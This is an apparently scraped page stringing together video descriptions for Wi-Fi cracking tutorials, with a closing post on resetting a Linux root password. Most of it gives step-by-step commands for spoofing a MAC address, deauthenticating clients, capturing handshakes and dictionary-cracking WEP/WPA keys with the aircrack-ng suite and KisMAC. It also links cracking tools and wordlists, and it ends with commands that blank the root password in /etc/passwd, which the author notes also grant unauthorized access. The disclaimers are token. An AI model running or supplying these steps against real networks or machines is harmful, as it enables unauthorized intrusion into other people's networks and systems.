See the proof that cracks and key generators are installing spyware to steal your credit card information, Paypal and Ebay accounts. If you do not belive it, repeat this step-by-step procedure on your PC. Do at your own risk! Your computer will be contaminated. See also: www.youtube.com Video Rating: 3 / 5
( hack wireless ) How to crack wepkey..easy way (winaircrak) Video Rating: 5 / 5
ok let see if i can make this easy NOTE DOES NOT WORK ON VISTA 1.go to www.nakido.com download install it when it done got to help then to driver installation guild then scroll down hit i agree then a list of card will show up if not your card will not work if it doe select it next next and you done the driver install 2. way 2 to get driver for your card www.aircrack-ng.org got here and look 3. download this and extract to where you want www.nakido.com here the new one of ERW they say it works with vista try it and let me no www.nakido.com 4. then run the ERW.exe 5.follow vidoe ERW is a program which can crack any WEP / WPA SK wireless network key.CRACKING WIRELESS NETWORKS IS ILLEGAL… USE THIS PROGRAM CAREFULLY ONLY ON YOUR WIRELESS NETWORK CONNECTION hope this help feel free to post comment look at my other video i am still new to this hope the video are OK there will be more so subscrip if you want. bye good luck comments are off now do to to many fucking little kids you no who you are Video Rating: 4 / 5
How to Crack WEP & WPA with KisMAC. KisMAC Step by Step Tutorial: Kismac without injection, Kismac with Injection, Edimax, Alpha or Hawking WPA with Dic. Bruteforce QUESTIONS: Please Post on: easymactips.blogspot.com All info available at: easymactips.blogspot.com or http Warning: To operate KisMAC you’ll need: -A computer, -Mac OS X -KisMAC -A Brain, preferably a working one.
I JUST UPLOADED THE FILE TO RAPIDSHARE! SORRY ABOUT ME RUNNING OUT OF BANDWIDTH, ANYWAYS HERES THE LINK rapidshare.de U NEED TO HAVE SUCCESSFULLY DONE PART 1 OF CRACK WEP FOR BEGINNERS FOR THIS TO WORK www.youtube.com IF YOU DO NOT OR CANNOT DO THIS, THIS TUTORIAL WILL NOT WORK I wrote this one because it took me a while to figure out how to do all this, as there were no decent tutorials. This shows how to crack a WPA-PSK network. You need to have installed the commview drivers which i explain in cracking a WEP network part 1. ____COMMANDS____ Here are the commands i type into the three command prompts REMEMBER AT THE BEGINNING OF EVERY COMMAND PROMPT TYPE IN: cd c:\aircrack OR ELSE NOTHING WILL WORK! Prompt 1: airserv-ng -d “commview.dll|debug” once we find out what channel, we type airserv-ng -d “commview.dll|debug” -c 6 where 6 is the channel Prompt 2: airodump-ng 127.0.0.1:666 once we figure out channel we type airodump-ng –channel 6 -wc:\aircrack\file 127.0.0.1:666 where 6 is channel number Prompt 3: aireplay-ng -0 5 -a bssid of network 127.0.0.1:666 prompt 4: aircrack-ng -a 2 -w 1.lst Isaac-01.cap where Isaac-01.cap is the name of the captured airodump file
Please donate any amount of money to my paypal which is kivi12k@aol.com Better Quality: kivi12k.blip.tv or youtube better quality: www.youtube.com This is a tutorial on how to crack a WPA encrypted password. This information should only be used for education purposes. Steps: 1)airmon-ng stop wlan0 2)ifconfig wlan0 down 3)macchanger –mac 00:11:22:33:44:55 wlan0 4)airmon-ng start wlan0 5)airodump-ng wlan0 6)airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0 7)aireplay-ng -0 5 -a (bssid)wlan0 8)aircrack-ng (filename-01.cap)-w (dictionary location) If you need any help feel free to PM me or shoot me an instant message, a donation would also be appreciated. You can instant message me at: AIM – kivi12k@aol.com WINDOWS MESSENGER – kivi12k@hotmail.com YAHOO MESSENGER – kivi12k@ymail.com Video Rating: 4 / 5
WpaList 64 million? words: www.megaupload.com Blog Post: g0tmi1k.blogspot.com Video Rating: 4 / 5
This post is intended for users that forgot the root passwords or can’t use it due to other problems (corrupted file /etc/passwd or whatever). Can also be used to gain unauthorized to linux machines, but don’t do that.
What to do
Boot using a recovery CD or DVD.
Mount the drive
mount /mnt /dev/sda2
Replace the existing root password with an empty one
sed /^root/s/.*:root:/root::0:0:root:/ /mnt/etc/passwd